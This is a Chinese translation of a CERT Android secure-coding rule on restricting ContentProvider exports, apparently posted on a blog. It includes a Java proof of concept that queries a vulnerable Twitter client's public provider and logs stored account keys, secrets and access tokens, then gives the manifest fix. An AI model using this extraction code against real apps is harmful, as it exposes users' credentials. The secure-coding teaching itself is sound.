【Android平台中的安全编程】の ＃01-限制app的敏感ContentProvider的可访问性

本文翻译自https://www.securecoding.cert.org/confluence/display/java/DRD01-J.+Limit+the+accessibility+of+an+app%27s+sensitive+content+provider，有增删改。

ContentProvider类提供了与其他app管理和共享数据的机制。当与其他app共享provider的数据时，必须小心的实现访问控制，防止对敏感数据的非法访问。
限制ContentProvider的访问有三种方法：
Public
Private
Restricted access

［Public］
在AndroidManifest.xml文件中声明android:exported属性，ContentProvider就可以公开给其他app使用，Android API Level 16之前的版本，ContentProvider默认是public的，除非显式的声明android:exported=“false”，例如：

<provider android:exported="true" android:name="MyContentProvider" android:authorities="com.example.mycontentprovider" />

如果ContentProvider被设置为Public，那么存储在ContentProvider里面的数据就可以被其他app访问到。因此，设计上必须保证只公开了非保密的信息。

［Private］
在AndroidManifest.xml文件中声明android:exported属性，可以将ContentProvider设置为Private的。从Android API Level 17及之后的版本，ContentProvider默认是Private的，不需要显式声明，例如：

<provider android:exported="false" android:name="MyContentProvider" android:authorities="com.example.mycontentprovider" />

如果ContentProvider不需要与其他app共享数据，那么就在manifest文件中声明android:exported=“false”，需要注意的是，在API Level 8及之前的版本，即使你显式声明android:exported=“false”，对应的ContentProvider还是能够被其他app访问到。

［Restricted Access］
未完待续

［不符合安全要求的代码例子］
MovatwiTouch，一个Twitter客户端，使用ContentProvider来管理Twitter的用户的key，secret和access token，然而这个ContentProvider是Public的，这使得安装在同一台手机上的其他应用可以获取到这些敏感信息。
下面的AndroidManifest.xml文件中Provider声明没有指定android:exported属性，因此，在API Level 16之前，这个ContentProvider是公开的。

<provider android:name=".content.AccountProvider" android:authorities="jp.co.vulnerable.accountprovider" />

［概念验证］
下面的代码展示了Public的ContentProvider漏洞如何被利用

// check whether movatwi is installed.
try {
ApplicationInfo info = getPackageManager().getApplicationInfo("jp.co.vulnerable", 0);[cjl5]
} catch (NameNotFoundException e) {
Log.w(TAG, "the app is not installed.");
return;
}
// extract account data through content provider
Uri uri = Uri.parse("content://jp.co.vulnerable.accountprovider");
Cursor cur = getContentResolver().query(uri, null, null, null, null);[cjl6]
StringBuilder sb = new StringBuilder();
if (cur != null) {
int ri = 0;
while (cur.moveToNext()) {
++ri;
Log.i(TAG, String.format("row[%d]:", ri));
sb.setLength(0);
for (int i = 0; i < cur.getColumnCount(); ++i) {
String column = cur.getColumnName(i);
String value = cur.getString(i);
if (value != null) {
value = value.replaceAll("[\r\n]", "");
}
Log.i(TAG, String.format("\t%s:\t%s", column, value));
}
}
} else {
Log.i(TAG, "Can't get the app information.");
}

［解决方案］
在AndroidManifest.xml文件中将ContentProvider显式声明为

android:exported=“false”
<provider android:name=".content.AccountProvider" android:exported="false" android:authorities="jp.co.vulnerable.accountprovider" />

——欢迎转载，请注明出处 http://blog.csdn.net/asce1885 ，未经本人同意请勿用于商业用途，谢谢——